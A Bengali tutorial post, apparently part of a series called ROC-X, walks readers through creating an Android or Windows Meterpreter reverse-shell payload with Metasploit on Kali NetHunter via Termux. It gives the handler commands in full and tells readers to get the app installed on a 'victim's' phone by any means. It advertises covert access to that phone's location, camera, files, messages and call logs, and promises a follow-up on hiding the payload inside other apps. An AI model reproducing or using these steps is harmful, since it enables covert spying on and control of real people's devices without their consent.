হ্যালো , আসসালামুআলাইকুম বন্ধুরা সবাই কেমন আছেন? আশা করি অনেক ভাল আছেন। আমি সানাউর আসিফ, তো চলুন শুরু করা যাক আজকের টপিক।
Topic : Hack Device Via PayLoad
তো, আজকে আমরা MetaSploit Framework ব্যবহার করে এমন একটি payload তৈরি করব । যেটা দিয়ে আমরা একই নেটওয়ার্কে থাকা ডিভাইস কন্ট্রোল করতে পারব। এবং এই টুলসটি দিয়ে যেকোনো কাজ করতে পারবেন।
নিচে কিছু কাজ দেওয়া হলো :
১. ভিকটিমের লাইভ লোকেশন বের করতে পারবেন।
২.তার ফোনের সমস্ত ফাইল ভিডিও অডিও অ্যাক্সেস করতে পারবেন।
৩. তার ফোনে যেকোন ফাইল আপলোড করতে পারবেন।
৪. যেকোনো সময় ওই ফোনের ক্যামেরা অন করে ভিডিও নিতে পারবেন।
৫.স্ক্রিনশট এবং স্ক্রিন রেকর্ড করতে পারবেন।
৬. তার ফোনে যে কোন অ্যাপস ইন্সটল করে দিতে পারবেন।
৭. তার ফোনের যেকোন ইনফরমেশন নিতে পারবেন।
৮. যেকোনো সময় যেকোনো অডিও প্লে করতে পারবেন।
৯. যে কোন সিস্টেম কোড এক্সিকিউট করতে পারবেন।
১০. মেসেজ কল লিস্ট চেক করতে পারবেন।
১১. ওই ফোন থেকে যেকোনো জায়গায় মেসেজ সেন্ড করতে পারবেন।
এছাড়াও আরও অনেক অনেক কিছু করতে পারবেন যা আমি পরবর্তী পোস্টে দেখিয়ে দেব।
তো চলুন শুরু করা যাক মূল টপিক।
তো, যারা Kali NetHunter ইন্সটল না করেই এই পোস্ট এ এসে গেছেন। তারা নিচের পোস্ট থেকে Kali NetHunter ইন্সটল করে আসুন।
[ROC-X:06] এবার ইন্সটল করুন Android হ্যাকিং প্ল্যাটফর্ম Kali Linux NetHunter । Termux টুলস এর সাহায্যে। [Installation Only]
তো, প্রথমেই Termux ওপেন করে নিচের কমান্ড দিয়ে ROC-X টুলস চালু করতে হবে।
cd $HOME/roc-x
এবার [4] MetaSploit Framework সিলেক্ট করতে 4 লিখে ইনপুট দিন।
এবার এখানে নিচের মত ইন্টারফেস দেখাবে। এবং এখানে বলবে যে এই সার্ভিস অন করার জন্য আপনাকে অবশ্যই Kali NetHunter ইনস্টল করা থাকতে হবে। তাই আমার আগের পোস্ট থেকে Kali NetHunter ইনস্টল করে নিন।
এবার Kali NetHunter ইন্সটল করা থাকলে নিচের মত y লিখে দিন।
এবার এখন আপনার ভিকটিমের যদি এন্ড্রয়েড ডিভাইস হয় তাহলে এখান থেকে [2] Create PayLoad for Android সিলেক্ট করবেন। আর যদি আপনার ভিকটিমের ডিভাইস একটি কম্পিউটার হয়, তাহলে [3] Create PayLoad for Windows সিলেক্ট করবেন। আমি এখন অ্যান্ড্রয়েডের তা দেখাবো। তাই আমি এখানে 2 লিখে ইনপুট দিলাম।
এবার নিচের মত দেখতে পাবেন যেখানে আপনার LHOST ইনপুট দিতে বলবে।
এখন LHOST টি বের করার জন্য আমাদেরকে বাম সাইড থেকে স্লাইড করতে হবে।
এবার নিচের মত New Session বাটনে ক্লিক করতে হবে।
এবার এখানে নিচের মত করে কমান্ডটি দিতে হবে।
ifconfig
এবার আপনি নিচের মত একটি আইপি দেখতে পাবেন ।
এটি কপি করে নিন
এবার
এবার আবারো স্লাইড করে প্রথম ট্যাবে চলে যাবেন।
এবার এখানে এসে কপি করা এড্রেসটি পেস্ট করে দেবেন।
এখানে যে কোন 4 ডিজিটের পোর্ট নাম্বার দিয়ে দিবেন।
এবার এখানে তৈরি করা PayLoad এর যা খুশি একটা নাম দিয়ে দিবেন।
এবার নিচের মত দেখতে পাবেন । এখানে আপনাকে 10 থেকে 15 মিনিট অপেক্ষা করতে হবে।
এবার নিচের মত আসলে বুঝবেন আপনার PayLoad টি ক্রিয়েট করা হয়ে গিয়েছে।
এবার এন্টার প্রেস করুন।
এবার [1] Start MetaSploit Console সিলেক্ট করার জন্য 1 লিখে ইনপুট দিন।
এবার এখানে আপনাকে 5 থেকে 10 মিনিট অপেক্ষা করতে হবে।
নিচের মত আসলে বুঝবেন ঠিকমতো কাজ হচ্ছে।
এবার আপনার টার্মিনালে ঠিক নিচের মত না আসলেও যদি শুধুমাত্র msf6> লেখাটি আসে তাহলে বুঝবেন আপনি ঠিকমতো কাজ করছেন।
এবার ওখানে নিচের কমান্ডটি দিন।
use exploit/multi/handler
এখন আপনি যদি কম্পিউটারের জন্য PayLoad টি বানিয়ে থাকেন তাহলে নিচের কমান্ডটি দিবেন।
set payload windows/meterpreter/reverse_tcp
আর আপনি যদি এন্ড্রয়েড এর জন্য PayLoad বানিয়ে থাকেন তাহলে নিচের কমান্ডটি দিবেন।
set payload android/meterpreter/reverse_tcp
আমি অ্যান্ড্রয়েডের জন্য করব তাই এখানে নিচের কমান্ডটি দিলাম।
এবার আপনাকে LHOST সিলেক্ট করতে হবে।
Payload তৈরি করার সময় যেই LHOST টি দিয়েছিলেন এখানে সেটি দিয়ে দিবেন।
যেমন আমি দিয়েছিলাম 127.0.0.1 । তাই আমি এখানে কমান্ড দিব ।
set LHOST 127.0.0.1
এবার Payload তৈরি করার সময় যেই LPORT টি দিয়েছিলেন এখানে সেটি দিয়ে দিবেন।
যেমন আমি দিয়েছিলাম 2580 । তাই আমি এখানে কমান্ড দিব ।
set LPORT 2580
এবার এখানে exploit
লিখে কমান্ড দিবেন ।
এবার নিচের মত আসলে বুঝবেন আপনার টার্মিনাল ডাটা রাখার জন্য রেডি হয়ে গিয়েছে।
এবার আপনার ফোন মেমোরিতে চলে যান। সেখানে ROC-X নামে একটি ফোল্ডার দেখতে পাবেন।
ওখানে আপনি তৈরি করার সময় যে নাম দিয়েছিলেন সে নামে একটি সফটওয়্যার দেখতে পাবেন।
এখন এটি আপনি যার ডিভাইসের করতে চান তার ফোনে কোন ভাবে ইন্সটল করিয়ে দেবেন। ইনস্টল করা এটি অটোমেটিক্যালি সব পারমিশন পেয়ে যাবে। আলাদা করে দেওয়ার প্রয়োজন নেই। শুধুমাত্র একবার Open বাটনে ক্লিক করবেন।
(তো অনেকে এখানে বলবেন যে ভিকটিমের ফোনে তো সে এরকম সফটওয়্যার ইন্সটল করবে না। তবুও সমস্যা নেই । আমি পরবর্তী পোস্টে দেখাবো কিভাবে যে কোন অ্যাপের সাথে আপনি আপনার PayLoad বাইন্ড করে দেবেন।)
ভিকটিমের ফোনে এটি একবার ওপেন করার পর Termux ফিরে এসে দেখবেন ওখানে একটি টার্মিনাল ওপেন হবে এবং ওখানে লেখা থাকবে meterpreter>
আর এটি লেখা থাকলে বুঝবেন আপনার টার্মিনাল ভিকটিমের ফোনের সাথে কানেক্ট হয়ে গিয়েছে।
এখন আপনি ওই ভিকটিমের ফোনে যা খুশি করতে পারেন।
তো কি কি করতে পারবেন এবং কোন কমান্ড দিয়ে কি করবেন তা দেখার জন্য help
লিখে কমান্ড দিতে হবে ।
( তবুও আমি কাজের জন্য কিভাবে কোন কমান্ডটি রান করাতে হবে তা নিয়ে পরবর্তীতে পোস্ট দিব ইনশাল্লাহ)
তো দেখুন নিচের সকল কমান্ড এবং কমান্ডার কাজ লেখা চলে আসছে।
তো আমি এখন খুবই সহজ দুইটি কমান্ড দিয়ে দেখাচ্ছি।
তো দেখুন আমি প্রথমেই check_root
লিখে কমান্ড দিলাম। এবং এটি নিচে লেখা আসলো The Device is Not Rooted । তার মানে আমি যে ফোনে PayLoad টি ইন্সটল করেছিলাম সেটি Rooted না।
তো এখন আমি দেখবো ওই ফোনে কি কি অ্যাপস ইন্সটল করা আছে। তাই আমি কমান্ড দিলাম app_list
তো এবার দেখুন এখানে ভিকটিম এর ফোনের সকল অ্যাপসের লিস্ট দেখিয়ে দিয়েছে।
তো এভাবেই এখানে আপনার যা খুশি তাই করতে পারবেন যে কোন কমান্ড রান করে। তবুও আমি পরবর্তীতে সবগুলো কমান্ড নিয়ে একটি পোস্ট করব ইনশাল্লাহ।
তো আজকে এই পর্যন্তই ছিল।
My YouTube Channel
কোথাও কোন সমস্যা হলে What’s App Group এ জানাতে পারেন। Solve করে দিব ইনশাআল্লাহ।
ROC-X What’s App Group
পোস্টটি কেমন লাগলো অবশ্যই কমেন্টে জানাবেন এবং কোন সমস্যা/ভুল হলে সেটাও কমেন্টে জানাবেন । ধন্যবাদ সবাইকে। আল্লাহ হাফেজ।